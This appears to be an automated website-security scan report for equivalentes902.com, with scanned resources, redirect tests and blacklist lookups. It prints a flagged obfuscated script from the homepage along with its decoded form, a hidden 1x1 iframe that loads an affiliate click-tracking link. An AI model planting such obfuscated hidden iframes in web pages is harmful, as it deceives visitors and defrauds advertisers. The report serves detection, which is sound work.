Scanned pages/files
Request | Server response | Status |
http://www.equivalentes902.com/ | 200 OK Content-Length: 14717 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) str='@3c@69@66@72@61@6d@65@20@73@72@63@3d@22@68@74@74@70@3a@2f@2f@63@6c@6b@2e@74@72@61@64@65@64@6f@75@62@6c@65@72@2e@63@6f@6d@2f@63@6c@69@63@6b@3f@70@28@32@32@36@39@32@35@29@61@28@32@33@37@38@38@33@37@29@67@28@32@30@37@36@32@38@34@38@29@22@20@77@69@64@74@68@3d@22@31@22@20@68@65@69@67@68@74@3d@22@31@22@3e@3c@2f@69@66@72@61@6d@65@3e'; document.write(unescape(str.replace(/@/g,'%'))); Decoded script: <iframe src="http://clk.tradedoubler.com/click?p(226925)a(2378837)g(20762848)" width="1" height="1"></iframe> Antivirus reports:
| ||
http://www.equivalentes902.com/typo3temp/javascript_a708894199.js | 404 Not Found Content-Length: 1363 Content-Type: text/html | clean |
http://www.equivalentes902.com/test404page.js | 404 Not Found Content-Length: 1363 Content-Type: text/html | clean |
http://www.google.es/coop/cse/brand?form=cse-search-box&lang=es | 200 OK Content-Length: 2510 Content-Type: text/javascript | clean |
http://www.equivalentes902.com//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js/ | 404 Not Found Content-Length: 1363 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: equivalentes902.com
Result:
GET / HTTP/1.1
Host: equivalentes902.com
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: equivalentes902.com
Referer: http://www.google.com/search?q=equivalentes902.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: equivalentes902.com
Referer: http://www.google.com/search?q=equivalentes902.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=equivalentes902.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://equivalentes902.com/
Result: equivalentes902.com is not infected or malware details are not published yet.
Result: equivalentes902.com is not infected or malware details are not published yet.